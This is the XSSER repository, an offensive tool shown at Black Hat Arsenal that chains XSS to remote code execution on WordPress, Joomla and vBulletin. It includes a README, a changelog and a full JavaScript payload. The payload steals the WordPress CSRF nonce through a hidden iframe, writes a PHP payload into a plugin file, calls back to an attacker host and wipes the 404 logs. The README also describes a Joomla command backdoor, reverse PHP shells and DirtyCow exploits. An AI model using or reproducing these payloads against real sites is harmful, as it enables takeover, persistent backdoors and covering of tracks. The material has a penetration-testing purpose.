README.md
XSSER
==========

<a href="https://www.blackhat.com/eu-15/arsenal.html"><img alt="Black Hat Arsenal" src="https://rawgit.com/toolswatch/badges/master/arsenal/2015.svg" /></a>

<a href="https://www.blackhat.com/eu-16/arsenal.html"><img alt="Black Hat Arsenal" src="https://rawgit.com/toolswatch/badges/master/arsenal/2016.svg" /></a>

<a href="https://www.blackhat.com/eu-17/arsenal.html"><img alt="Black Hat Arsenal" src="https://rawgit.com/toolswatch/badges/master/arsenal/2017.svg" /></a>

### Presentation
* From XSS to RCE 2.75 - Black Hat Europe Arsenal 2017

### Demo
* Version 2.0  - 2015: https://www.youtube.com/playlist?list=PLIjb28IYMQgqqqApoGRCZ_O40vP-eKsgf
* Version 2.5  - 2016: https://www.youtube.com/playlist?list=PLRic6PgcrsWGkgacL6WFnSQKVRZIoofRj
* Version 2.75 - 2017: None Currently Available 

Requirements
------------
* Python (2.7.*, version `2.7.14` was used for development and testing)
* Msfconsole (accessible via environment variables)
* Netcat (nc)
* PyGame (pip install pygame)
* jsmin (new dependency - pip install jsmin)
* xterm (previously gnome and bash)

To install the Python dependencies, you can run the following command:

`pip install -r requirements.txt`

If you're using a virtual environment, then you may need to use the full list:

`pip install -r requirements-all-libraries-used.txt`

For installation instructions on Ubuntu 16.04.1 LTS, please refer to the wiki: https://github.com/Varbaek/xsser/wiki

Removed Dependencies:
------------
* Gnome (switched to xterm)
* Bash (only tested in bash, but should work in other terminals)
* cURL (switched to native python requests)

Payload Compatibility
------------
* Chrome (2018) - Tested live at Black Hat Arsenal 2017 and during extras development.
* Firefox - Untested - Should still work as available JS features are almost the same.

WordPress Lab
------------------
* WordPress http://wordpress.org/
* Better WP Security 3.5.3 http://www.exploit-db.com/wp-content/themes/exploit/applications/c6d6beb3c11bc58856e15218d512b851-better-wp-security.3.5.3.zip
* Optional: WPSEO https://yoast.com/wordpress/plugins/seo/

WordPress Exploit
------------------
* http://www.exploit-db.com/exploits/27290/

Joomla Lab
------------------
* Joomla https://www.joomla.org/
* SecurityCheck 2.8.9 https://www.exploit-db.com/apps/543ccd00b06d24be139d7e18212a0916-com_securitycheck_j3x-2.8.9.zip

Joomla Exploit
------------------
* https://www.exploit-db.com/exploits/39879/

Directories
------------
* Audio: Contains remixed audio notifications.
* Exploits: Contains DirtyCow (DCOW) privilege escalation exploits.
* Hello_Shell: Contains a Joomla extension backdoor, which can be uploaded as an administrator and 
               subsequently used to execute arbitrary commands on the system with ?c=ls or ?c64=base64_here.
               This directory was originally placed in "Joomla_Backdoor".
* Payloads/javascript: Contains the JavaScript payloads.
* Received_Data: Empty directory which will be used in future versions.
* Shells: Contains the PHP shells, including a slightly modified version of pentestmonkey's shell that 
          connects back via wget to send the attacker a notification of success.

Developed By
------------
* Hans-Michael Varbaek
* VarBITS

Special Credits
------------
* MaXe / InterN0T
* Sense of Security (Versions 2.0 - 2.5)

Code Design
-----------
* It works! (Again!)
* Still spaghetti code, but now with almost complete `PEP8` and possible refactoring in the future.
* Just-In-Time for Black Hat Europe 2017


CHANGELOG
CHANGELOG

/--------------\
| Version 2.75 |
\--------------/
General:
- Various improvements and optimizations.
- Various files may have comments such as: // noinspection JSUndefinedPropertyAssignment
  This type of comment is intended for PyCharm to ignore certain warnings and errors.
- Various todo notes have been added to the files for future versions. These also function
  as a roadmap, to see what's planned in upcoming releases.
- Added another command to run during post-exploitation scenarios for WordPress.
- Added some other commands and resources for post-exploitation in general.
- Formatted license slightly so that it has appropriate linebreaks.
- Added "requirements.txt" and "requirements-all-libraries-used.txt" files for easier
  dependency installation with python pip.

Joomla backdoor:
- Now checks if the "c" or "c64" parameters are set before executing any code.
- Base64 encoded payloads are now, also supported via the "c64" HTTP parameter.
- All error reporting has been disabled for this backdoor.
- For added stealth, this backdoor/plugin can e.g. be encoded. (Refer to PHP files.)
- Additional comments about advanced usage can also be found in the PHP files.
- For changing how the plugin itself works and is referenced within Joomla,
  please refer to the helloshell.xml file. Note: Almost everything can easily be changed
  in these files, except the directory name which must also be renamed in xsser.py.

JavaScript payloads:
- Added a new educational and generic payload. This has not been implemented into xsser.py yet.
- Versions standardized across all payloads.
- SetCookie() now uses non-deprecated functions.
- The "cookie match" now uses regular expressions to properly check if the attacker's cookie is present.
- Joomla payloads now have a "self-removal" option for the initial injection.
  Note: This only seems to work when executed manually at the moment.
- WordPress payloads have been updated to use "nonce" instead of "_wpnonce", as this was changed since
  last year. A future version may be used to generate the correct payload, depending on whether a very
  old version of WordPress is in use, or a currently up to date version.
- The prepopulated forms in the WordPress payloads have been updated, to accommodate source code changes
  since last year.
- setTimeout() was updated so it is used in a better, and more maintainable manner.
- Header sections are now more standardized, in terms of design and layout.

XSSER:
- Switched from gnome-terminal to xterm due to several configuration options being deprecated.
- Removed the redundant requirements description. Please refer to the README.md file instead.
- Removed "written for", "tested on", "tested against", and "changelog". Refer to README.md
- Added new function which gets all assigned IP addresses and lets the user choose which to listen on.
  This minimizes the time that the user has to spend on typing the IP address to listen on and serve files from.
  -- vBSEO and BetterWPSecurity Exploits: PHP and JS filenames are now generated in a more random manner.
- All JavaScript payloads are now minified (comments and extra newlines removed) and base64 encoded during run-time.
- Converted all "os.system(curl)" requests to python requests with 3 second timeout instead.
- Converted all "httplib.HTTPConnection()" requests to python 'requests' with 3 second timeout.
- Replaced all "%s" with "{}".format()
- Joomla "Hello_Shell" backdoor (zip) file, is now automatically generated each time the xsser.py tool runs.
  Note: If you make a change to any of the files in the Hello_Shell directory, simply exit xsser.py and run
  it again to automatically create the zip file.
- Experimental POST-request handler implemented into the generic web server. This is currently not used.

Testing:
- All exploits and payloads have been tested against the latest application versions, except vBulletin 4.X.X
  which is not compatible with the now deprecated vBSEO plugin.

/-------------\
| Version 2.5 |
\-------------/
- WordPress Theme and Plugin injection are not using a hardcoded hostname anymore. (TARGETWEBSITE is now
  properly replaced)
- Removed deprecated code for WordPress Theme and Plugin injection, so that the user is not asked twice to
  provide hostname.
- Added dirtycow 32-bit and 64-bit source code files to the web servers. https://www.exploit-db.com/exploits/40616/
  Note: This seems to cause kernel panic after the user quits the shell.
- Removed --title from gnome-terminal commands as this option is no longer supported.
- Notifications:
  -- Added notifications to the console / web server log.
  -- Added a popup notification with some ASCII text, when the JavaScript has been fully executed by the target.
  -- Added a voice notification, when the Reverse PHP Shell (Notify) option is used, and the associated code
     in the PHP shell connects back to the attacker's machine.
- Automation:
  -- vBulletin and WordPress shells are now automatically activated when the JavaScript is triggered.
- New attack vectors:
  -- Joomla "SecurityCheck" Addon - https://www.exploit-db.com/exploits/39879/ - EDB ID: 39879

/-------------\
| Version 2.0 |
\-------------/
- First public version for Black Hat Europe

Payloads/javascript/wordpress_plugin.js
/*
Title: WordPress Core Payload (Plugin)
Author: Hans-Michael Varbaek
Company: VarBITS

Version: 2.75

Changelog:
- Ver 2.75 : Various minor improvements. Version standardized across all files.
- Ver 2.5  : Added XMLHttpRequest for JS Notification.
- Ver 2.5  : request.open() on Line 75 is now set by xsser.py
- Ver 2.0  : First release.

Special Credits: InterN0T and Sense of Security (Versions 2.0 to 2.5)

Usage Notes:
-- The hello.php plugin does not need to be activated within WordPress
   However, it does need to be present and writeable

Compatibility Notes:
-- Very old browsers won't support FormData() and XMLHttpRequest()

Requirements:
1) Ability to edit plugin files. (Default feature. However, this is typically disabled in hardened configurations.)

For ethical and legal purposes only. This script is provided as is and without warranty.

TODO:
- For pre-existing forms, consider using FormData to read and update/set new values in the future:
https://developer.mozilla.org/en-US/docs/Web/API/FormData/Using_FormData_Objects
https://developer.mozilla.org/en-US/docs/Web/API/FormData
https://developer.mozilla.org/en-US/docs/Web/API/FormData/set
-- Update or add another payload which uses FormData() and XMLHttpRequest()
*/

var php_input = '<?php PHP_PAYLOAD /* ?>'; // This payload comments out any subsequent PHP code

// Our iframe function which primarily injects a prepopulated form
// noinspection JSUnusedGlobalSymbols
function silent_plugins_inject() {
    //if (document.cookie.indexOf("Plugins_Infected") == -1) {
    // TODO: Make the "Plugins_Infected" cookie name a function argument for silent_plugins_inject()
    if (!document.cookie.match(/^(.*;)?\s*Plugins_Infected\s*=\s*[^;]+(.*)?$/)) {

        // Read and save the relevant "_wpnonce" - Bypass CSRF protection
        // TODO: Consider generating the correct "nonce"-reading code below, which depends on the WordPress version in use.
        // var plugin_wpnonce = document.getElementById('silent_plugins_frame').contentDocument.getElementById('template')._wpnonce.value; // WP Nonce / CSRF Token
        // Newer versions use "nonce" instead of _wpnonce
        // noinspection Annotator
        var plugin_wpnonce = document.getElementById('silent_plugins_frame').contentDocument.getElementById('template').nonce.value; // WP Nonce / CSRF Token
        var plugin_contents = document.getElementById('silent_plugins_frame').contentDocument.getElementsByTagName('textarea')[0].value; // Current contents of the file

        // TODO: Use the pre-existing form in the future if possible.
        // Initiate the form data object
        var formData = new FormData();

        // Create a variable which holds our PHP payload, a new line (Windows format), and then the current plugin data
        var special_content = php_input+'\r\n'+plugin_contents;

        // Prepopulated form with the CSRF ("_wpnonce") token and our PHP payload as specified
        // formData.append("_wpnonce", plugin_wpnonce);
        formData.append("nonce", plugin_wpnonce); // Variable has changed name to "nonce"
        formData.append("_wp_http_referer", "%2Fwp-admin%2Fplugin-editor.php%3Ffile%3Dhello.php");
        formData.append("newcontent", special_content);
        // formData.append("action", "update"); // This value has changed. See below
        formData.append("action", "edit-theme-plugin-file");
        formData.append("file", "hello.php");
        formData.append("plugin", "hello.php");
        // formData.append("theme", ""); // This is no longer needed. Keep for now
        // formData.append("scrollto", "0"); // Probably not needed. Keep for now
        formData.append("docs-list", "");

        // Initiate XMLHttpRequest
        var request_one = new XMLHttpRequest();

        // Method and URL to send the request to.
        request_one.open("POST", "http://TARGETWEBSITE/wp-admin/plugin-editor.php"); // Set by: xsser.py
        // Example contents: http://www.some-wordpress-website.tld/wp-admin/plugin-editor.php
        // TODO: We may need to change this to ... /wp-admin/plugin-editor.php?file=hello.php

        // Send the request with our form data
        request_one.send(formData);

        // TODO: Maybe change the cookie name and value in the future.
        SetCookie("Plugins_Infected", "true"); // Prevent re-infection / loops

        // Notification feature
        var request_two = new XMLHttpRequest(); // Initiate XMLHttpRequest
        request_two.open("GET", "http://CALLBACKHOST:CALLBACKPORT/js_shell_notify.txt");
        // Method and URL to send the request to - Hostname and port are set by xsser.py
        request_two.send(); // Send the request

        clean_up(); // Remove initial payload from server

    }
}

// ============================================= FUNCTIONS START ============================================= \\

// Injects the main hidden iframe into the page
// USAGE: main_frame_inject("Plugins_Infected", "silent_plugins_frame", "silent_plugins_inject()", "plugin-editor.php?file=hello.php");
function main_frame_inject(cookiename, identifier, function_name, get_page) {
    //if (document.cookie.indexOf(cookiename) == -1) {
    var re_cookie = new RegExp('^(.*;)?\\s*'+cookiename+'\\s*=\\s*[^;]+(.*)?$');
    if (!document.cookie.match(re_cookie)) {

        // Append a (hidden) iframe to the HTML body for data injection
        var mainframe = document.createElement("iframe");
        mainframe.setAttribute('id', identifier);
        top.document.body.appendChild(mainframe);
        mainframe.setAttribute('onload', function_name);
        mainframe.setAttribute('style', 'visibility:hidden;display:none');
        mainframe.setAttribute('src', get_page);
    }
}

// Sets a cookie with a very long expiration time
// USAGE: SetCookie("Plugins_Infected", "true");
// TODO: Look into HTML5 Storage instead of cookies maybe.
function SetCookie(cookieName, cookieContent) {
    var cookiePath = '/';
    var expDate=new Date();
    expDate.setTime(expDate.getTime()+372800000);
    var expires=expDate.toUTCString();
    document.cookie=cookieName+"="+encodeURIComponent(cookieContent)+";path="+encodeURI(cookiePath)+";expires="+expires;
}

// NOTE: This function should always be executed after the final stage
// Delete all 404 log errors - Including the injected payload(s)
// This function is specific to the Better WP Security XSS issue
// TODO: Replace the contents of this function with a "place-holder" variable in the next version.
// TODO: This variable, is then replaced, depending on the component being exploited.
// USAGE: clean_up()
function clean_up() {
    // noinspection JSUndefinedPropertyAssignment
    document.getElementById('404s').checked=true;
    document.forms[0].submit();
}

// ============================================= FUNCTIONS END ============================================= \\

// USAGE: main_frame_inject("Plugins_Infected", "silent_plugins_frame", "silent_plugins_inject()", "plugin-editor.php?file=hello.php");
// function main_frame_inject(cookiename, identifier, function_name, get_page)
main_frame_inject("Plugins_Infected", "silent_plugins_frame", "silent_plugins_inject()", "plugin-editor.php?file=hello.php");
